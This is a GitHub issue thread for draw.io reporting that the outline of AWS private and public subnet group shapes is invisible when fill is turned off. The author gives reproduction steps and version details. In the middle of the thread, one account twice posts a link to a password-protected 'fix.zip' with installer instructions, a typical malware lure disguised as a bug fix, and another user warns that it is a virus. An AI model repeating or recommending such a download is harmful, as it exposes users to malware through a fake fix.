### ISSUE TITLE
Bug: AWS Cloud - Subnet Group - Invisible Outline

### ISSUE THREAD

**Issue by starlord-93** [jgraph/drawio#4627]
### Preflight Checklist

* [x] I agree to follow the [Code of Conduct](https://github.com/jgraph/drawio/blob/dev/CODE_OF_CONDUCT.md) that this project adheres to.
* [x] I have searched the issue tracker for a feature request that matches the one I want to file, without success.

You must agree to search and the code of conduct. You must fill in this entire template. If you delete part/all or miss parts out your issue will be closed.

If you are technical, you should reporting bugs along the lines of https://marker.io/blog/how-to-write-bug-report. If you are not technical, we will make allowances, please try to make an effort to understand the process.

**Describe the bug**
AWS Cloud - Subnet Group - Outline is Invisible

**To Reproduce**
1. Go to 'AWS / Groups' from 'Shapes Panel'
2. Click on 'Private Subnet' or 'Public Subnet'
3. Unselect Fill from 'Style' Panel
4. Even though 'Line' is selected, that line is invisible
5. I attempted to copy the 'style' from the 'region' group, but it did not work.

**Expected behavior**
The outline should be visible as suggested by AWS in the 2024 Architecture diagram document, which is the expected behavior.

**Screenshots**
I have added screenshots to help explain your problem.

Drawio-Ref:
![image](https://github.com/user-attachments/assets/d9b5f210-2f35-4192-8d47-5f60dea02315)

AWS-Ref:
![image](https://github.com/user-attachments/assets/bbe795f8-c4de-4670-bb6f-cb02d054c886)

**draw.io version (In the Help->About menu of the draw.io editor):**

- draw.io version 24.6.4 (both Online and Offline)

**Desktop (please complete the following information):**
 - OS: [Windows 11]
 - Browser [Microsoft Edge]
 - Browser Version [Version 127.0.2651.105 (Official build) (64-bit)]

**Smartphone (please complete the following information):**
 - Device: [N/A]
 - OS: [N/A]
 - Browser [N/A]
 - Version [N/A]

**I tested the problem in incognito/private mode with all browser extensions switched off, write "yes" below:**
yes

**Additional context**
It would be really helpful if you could fix this. I appreciate your work. Thank you.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file. This is a computer virus.

**Comment by davidjgraph** [comment]
Please link to the document you mentioned.
